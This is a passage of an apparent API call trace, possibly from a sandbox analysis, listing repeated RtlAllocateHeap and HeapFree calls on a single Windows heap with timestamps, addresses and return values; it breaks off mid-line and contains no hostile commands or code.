[0108.806] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x39487f0 [0108.807] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x395ba00 [0108.807] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x396ec10 [0108.808] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3981e20 [0108.808] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3995030 [0108.809] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x39a8240 [0108.809] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x39bb450 [0108.809] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x39ce660 [0108.810] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x39e1870 [0108.810] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x39f4a80 [0108.810] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3a07c90 [0108.811] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3a1aea0 [0108.812] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3a2e0b0 [0108.812] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3a412c0 [0108.813] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3a544d0 [0108.813] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3a676e0 [0108.814] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3a7a8f0 [0108.814] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3a8db00 [0108.815] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3aa0d10 [0108.815] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3ab3f20 [0108.815] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3ac7130 [0108.816] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3ada340 [0108.816] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3aed550 [0108.816] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3b00760 [0108.817] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3b13970 [0116.778] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x567460 | out: hHeap=0x530000) returned 1 [0116.779] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x587260 | out: hHeap=0x530000) returned 1 [0116.779] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x59a470 | out: hHeap=0x530000) returned 1 [0116.779] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5ad680 | out: hHeap=0x530000) returned 1 [0116.779] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5c0890 | out: hHeap=0x530000) returned 1 [0116.779] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d3aa0 | out: hHeap=0x530000) returned 1 [0116.779] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5e6cb0 | out: hHeap=0x530000) returned 1 [0116.779] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5f9ec0 | out: hHeap=0x530000) returned 1 [0116.779] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x60d0d0 | out: hHeap=0x530000) returned 1 [0116.779] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x1e50080 | out: hHeap=0x530000) returned 1 [0116.779] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x1e63290 | out: hHeap=0x530000) returned 1 [0116.779] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x1e764a0 | out: hHeap=0x530000) returned 1 [0116.780] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x1e896b0 | out: hHeap=0x530000) returned 1 [0116.780] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x1e9c8c0 | out: hHeap=0x530000) returned 1 [0116.780] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x1eafad0 | out: hHeap=0x530000) returned 1 [0116.780] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x1ec2ce0 | out: hHeap=0x530000) returned 1 [0116.780] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x1ed5ef0 | out: hHeap=0x530000) returned 1 [0116.780] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x1ee9100 | out: hHeap=0x530000) returned 1 [0116.780] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x1efc310 | out: hHeap=0x530000) returned 1 [0116.780] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x1f0f520 | out: hHeap=0x530000) returned 1 [0116.780] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x1f22730 | out: hHeap=0x530000) returned 1 [0116.780] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2000080 | out: hHeap=0x530000) returned 1 [0116.780] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2013290 | out: hHeap=0x530000) returned 1 [0116.780] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x20264a0 | out: hHeap=0x530000) returned 1 [0116.780] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x20396b0 | out: hHeap=0x530000) returned 1 [0116.780] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x204c8c0 | out: hHeap=0x530000) returned 1 [0116.794] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x205fad0 | out: hHeap=0x530000) returned 1 [0116.795] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2072ce0 | out: hHeap=0x530000) returned 1 [0116.795] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2085ef0 | out: hHeap=0x530000) returned 1 [0116.795] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2099100 | out: hHeap=0x530000) returned 1 [0116.795] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x20ac310 | out: hHeap=0x530000) returned 1 [0116.795] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x20bf520 | out: hHeap=0x530000) returned 1 [0116.795] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x20d2730 | out: hHeap=0x530000) returned 1 [0116.795] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x20e5940 | out: hHeap=0x530000) returned 1 [0116.795] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x20f8b50 | out: hHeap=0x530000) returned 1 [0117.108] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x210bd60 | out: hHeap=0x530000) returned 1 [0117.108] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x211ef70 | out: hHeap=0x530000) returned 1 [0117.108] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2132180 | out: hHeap=0x530000) returned 1 [0117.108] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2145390 | out: hHeap=0x530000) returned 1 [0117.108] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x21585a0 | out: hHeap=0x530000) returned 1 [0117.108] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x216b7b0 | out: hHeap=0x530000) returned 1 [0117.108] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x217e9c0 | out: hHeap=0x530000) returned 1 [0117.108] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2191bd0 | out: hHeap=0x530000) returned 1 [0117.108] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x21a4de0 | out: hHeap=0x530000) returned 1 [0117.108] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x21b7ff0 | out: hHeap=0x530000) returned 1 [0117.108] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x21cb200 | out: hHeap=0x530000) returned 1 [0117.108] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x21de410 | out: hHeap=0x530000) returned 1 [0117.110] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2200080 | out: hHeap=0x530000) returned 1 [0117.110] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2213290 | out: hHeap=0x530000) returned 1 [0117.120] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x22264a0 | out: hHeap=0x530000) returned 1 [0117.120] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x22396b0 | out: hHeap=0x530000) returned 1 [0117.120] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x224c8c0 | out: hHeap=0x530000) returned 1 [0117.120] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x225fad0 | out: hHeap=0x530000) returned 1 [0117.120] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2272ce0 | out: hHeap=0x530000) returned 1 [0117.120] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2285ef0 | out: hHeap=0x530000) returned 1 [0117.120] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2299100 | out: hHeap=0x530000) returned 1 [0117.120] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x22ac310 | out: hHeap=0x530000) returned 1 [0117.120] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x22bf520 | out: hHeap=0x530000) returned 1 [0117.120] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x22d2730 | out: hHeap=0x530000) returned 1 [0117.120] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x22e5940 | out: hHeap=0x530000) returned 1 [0117.121] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x22f8b50 | out: hHeap=0x530000) returned 1 [0117.127] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x230bd60 | out: hHeap=0x530000) returned 1 [0117.127] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x231ef70 | out: hHeap=0x530000) returned 1 [0117.127] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2332180 | out: hHeap=0x530000) returned 1 [0117.127] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2345390 | out: hHeap=0x530000) returned 1 [0117.127] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x23585a0 | out: hHeap=0x530000) returned 1 [0117.128] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x236b7b0 | out: hHeap=0x530000) returned 1 [0117.128] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x237e9c0 | out: hHeap=0x530000) returned 1 [0117.128] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2391bd0 | out: hHeap=0x530000) returned 1 [0117.128] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x23a4de0 | out: hHeap=0x530000) returned 1 [0117.128] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x23b7ff0 | out: hHeap=0x530000) returned 1 [0117.136] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x23cb200 | out: hHeap=0x530000) returned 1 [0117.139] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x23de410 | out: hHeap=0x530000) returned 1 [0117.140] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x23f1620 | out: hHeap=0x530000) returned 1 [0117.140] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2404830 | out: hHeap=0x530000) returned 1 [0117.145] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2417a40 | out: hHeap=0x530000) returned 1 [0117.145] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x242ac50 | out: hHeap=0x530000) returned 1 [0117.145] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x243de60 | out: hHeap=0x530000) returned 1 [0117.145] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2451070 | out: hHeap=0x530000) returned 1 [0117.145] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2464280 | out: hHeap=0x530000) returned 1 [0117.145] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2477490 | out: hHeap=0x530000) returned 1 [0117.145] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x248a6a0 | out: hHeap=0x530000) returned 1 [0117.145] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x249d8b0 | out: hHeap=0x530000) returned 1 [0117.145] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x24b0ac0 | out: hHeap=0x530000) returned 1 [0117.145] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x24c3cd0 | out: hHeap=0x530000) returned 1 [0117.145] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x24d6ee0 | out: hHeap=0x530000) returned 1 [0117.145] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x24ea0f0 | out: hHeap=0x530000) returned 1 [0117.145] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x24fd300 | out: hHeap=0x530000) returned 1 [0117.145] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2510510 | out: hHeap=0x530000) returned 1 [0117.360] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2523720 | out: hHeap=0x530000) returned 1 [0117.360] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2536930 | out: hHeap=0x530000) returned 1 [0117.361] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2549b40 | out: hHeap=0x530000) returned 1 [0117.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x255cd50 | out: hHeap=0x530000) returned 1 [0117.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x256ff60 | out: hHeap=0x530000) returned 1 [0117.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2583170 | out: hHeap=0x530000) returned 1 [0117.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2596380 | out: hHeap=0x530000) returned 1 [0117.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x25a9590 | out: hHeap=0x530000) returned 1 [0117.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x25bc7a0 | out: hHeap=0x530000) returned 1 [0117.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x25cf9b0 | out: hHeap=0x530000) returned 1 [0117.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x25e2bc0 | out: hHeap=0x530000) returned 1 [0117.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2600080 | out: hHeap=0x530000) returned 1 [0117.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2613290 | out: hHeap=0x530000) returned 1 [0117.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x26264a0 | out: hHeap=0x530000) returned 1 [0117.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x26396b0 | out: hHeap=0x530000) returned 1 [0117.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x264c8c0 | out: hHeap=0x530000) returned 1 [0117.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x265fad0 | out: hHeap=0x530000) returned 1 [0117.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2672ce0 | out: hHeap=0x530000) returned 1 [0117.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2685ef0 | out: hHeap=0x530000) returned 1 [0117.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2699100 | out: hHeap=0x530000) returned 1 [0117.363] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x26ac310 | out: hHeap=0x530000) returned 1 [0117.370] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x26bf520 | out: hHeap=0x530000) returned 1 [0117.372] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x26d2730 | out: hHeap=0x530000) returned 1 [0117.372] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x26e5940 | out: hHeap=0x530000) returned 1 [0117.372] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x26f8b50 | out: hHeap=0x530000) returned 1 [0117.375] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x270bd60 | out: hHeap=0x530000) returned 1 [0117.375] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x271ef70 | out: hHeap=0x530000) returned 1 [0117.375] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2732180 | out: hHeap=0x530000) returned 1 [0117.375] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2745390 | out: hHeap=0x530000) returned 1 [0117.375] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x27585a0 | out: hHeap=0x530000) returned 1 [0117.375] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x276b7b0 | out: hHeap=0x530000) returned 1 [0117.375] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x277e9c0 | out: hHeap=0x530000) returned 1 [0117.375] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2791bd0 | out: hHeap=0x530000) returned 1 [0117.375] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x27a4de0 | out: hHeap=0x530000) returned 1 [0117.375] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x27b7ff0 | out: hHeap=0x530000) returned 1 [0117.375] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x27cb200 | out: hHeap=0x530000) returned 1 [0117.375] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x27de410 | out: hHeap=0x530000) returned 1 [0117.375] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x27f1620 | out: hHeap=0x530000) returned 1 [0117.375] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2804830 | out: hHeap=0x530000) returned 1 [0117.383] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2817a40 | out: hHeap=0x530000) returned 1 [0117.383] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x282ac50 | out: hHeap=0x530000) returned 1 [0117.384] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x283de60 | out: hHeap=0x530000) returned 1 [0117.384] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2851070 | out: hHeap=0x530000) returned 1 [0117.384] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2864280 | out: hHeap=0x530000) returned 1 [0117.384] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2877490 | out: hHeap=0x530000) returned 1 [0117.384] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x288a6a0 | out: hHeap=0x530000) returned 1 [0117.384] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x289d8b0 | out: hHeap=0x530000) returned 1 [0117.384] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x28b0ac0 | out: hHeap=0x530000) returned 1 [0117.384] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x28c3cd0 | out: hHeap=0x530000) returned 1 [0117.384] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x28d6ee0 | out: hHeap=0x530000) returned 1 [0117.384] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x28ea0f0 | out: hHeap=0x530000) returned 1 [0117.384] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x28fd300 | out: hHeap=0x530000) returned 1 [0117.384] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2910510 | out: hHeap=0x530000) returned 1 [0117.390] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2923720 | out: hHeap=0x530000) returned 1 [0117.390] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2936930 | out: hHeap=0x530000) returned 1 [0117.390] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2949b40 | out: hHeap=0x530000) returned 1 [0117.390] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x295cd50 | out: hHeap=0x530000) returned 1 [0117.603] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x296ff60 | out: hHeap=0x530000) returned 1 [0117.604] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2983170 | out: hHeap=0x530000) returned 1 [0117.604] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2996380 | out: hHeap=0x530000) returned 1 [0117.604] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x29a9590 | out: hHeap=0x530000) returned 1 [0117.604] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x29bc7a0 | out: hHeap=0x530000) returned 1 [0117.604] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x29cf9b0 | out: hHeap=0x530000) returned 1 [0117.604] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x29e2bc0 | out: hHeap=0x530000) returned 1 [0117.604] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x29f5dd0 | out: hHeap=0x530000) returned 1 [0117.604] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a08fe0 | out: hHeap=0x530000) returned 1 [0117.604] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a1c1f0 | out: hHeap=0x530000) returned 1 [0117.610] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a2f400 | out: hHeap=0x530000) returned 1 [0117.610] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a42610 | out: hHeap=0x530000) returned 1 [0117.610] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a55820 | out: hHeap=0x530000) returned 1 [0117.610] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a68a30 | out: hHeap=0x530000) returned 1 [0117.610] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7bc40 | out: hHeap=0x530000) returned 1 [0117.613] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a8ee50 | out: hHeap=0x530000) returned 1 [0117.614] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aa2060 | out: hHeap=0x530000) returned 1 [0117.614] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ab5270 | out: hHeap=0x530000) returned 1 [0117.614] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ac8480 | out: hHeap=0x530000) returned 1 [0117.614] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2adb690 | out: hHeap=0x530000) returned 1 [0117.614] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aee8a0 | out: hHeap=0x530000) returned 1 [0117.614] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b01ab0 | out: hHeap=0x530000) returned 1 [0117.614] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b14cc0 | out: hHeap=0x530000) returned 1 [0117.614] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b27ed0 | out: hHeap=0x530000) returned 1 [0117.619] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b3b0e0 | out: hHeap=0x530000) returned 1 [0117.619] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b4e2f0 | out: hHeap=0x530000) returned 1 [0117.619] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b61500 | out: hHeap=0x530000) returned 1 [0117.619] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b74710 | out: hHeap=0x530000) returned 1 [0117.619] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b87920 | out: hHeap=0x530000) returned 1 [0117.619] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b9ab30 | out: hHeap=0x530000) returned 1 [0117.622] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2badd40 | out: hHeap=0x530000) returned 1 [0117.625] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bc0f50 | out: hHeap=0x530000) returned 1 [0117.625] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd4160 | out: hHeap=0x530000) returned 1 [0117.625] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2be7370 | out: hHeap=0x530000) returned 1 [0117.625] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bfa580 | out: hHeap=0x530000) returned 1 [0117.625] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2c0d790 | out: hHeap=0x530000) returned 1 [0117.625] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2c209a0 | out: hHeap=0x530000) returned 1 [0117.625] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2c33bb0 | out: hHeap=0x530000) returned 1 [0117.630] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2c46dc0 | out: hHeap=0x530000) returned 1 [0117.630] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2c59fd0 | out: hHeap=0x530000) returned 1 [0117.630] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2c6d1e0 | out: hHeap=0x530000) returned 1 [0117.630] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2c803f0 | out: hHeap=0x530000) returned 1 [0117.631] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2c93600 | out: hHeap=0x530000) returned 1 [0117.631] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ca6810 | out: hHeap=0x530000) returned 1 [0117.633] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2cb9a20 | out: hHeap=0x530000) returned 1 [0117.635] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2cccc30 | out: hHeap=0x530000) returned 1 [0117.635] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2cdfe40 | out: hHeap=0x530000) returned 1 [0117.635] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2cf3050 | out: hHeap=0x530000) returned 1 [0117.635] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2d06260 | out: hHeap=0x530000) returned 1 [0117.635] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2d19470 | out: hHeap=0x530000) returned 1 [0117.635] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2d2c680 | out: hHeap=0x530000) returned 1 [0117.635] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2d3f890 | out: hHeap=0x530000) returned 1 [0117.851] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2d52aa0 | out: hHeap=0x530000) returned 1 [0117.851] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2d65cb0 | out: hHeap=0x530000) returned 1 [0117.851] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2d78ec0 | out: hHeap=0x530000) returned 1 [0117.851] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2d8c0d0 | out: hHeap=0x530000) returned 1 [0117.851] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2d9f2e0 | out: hHeap=0x530000) returned 1 [0117.853] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2db24f0 | out: hHeap=0x530000) returned 1 [0117.855] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2dc5700 | out: hHeap=0x530000) returned 1 [0117.855] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2dd8910 | out: hHeap=0x530000) returned 1 [0117.855] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2e00080 | out: hHeap=0x530000) returned 1 [0117.855] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2e13290 | out: hHeap=0x530000) returned 1 [0117.855] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2e264a0 | out: hHeap=0x530000) returned 1 [0117.856] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2e396b0 | out: hHeap=0x530000) returned 1 [0117.856] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2e4c8c0 | out: 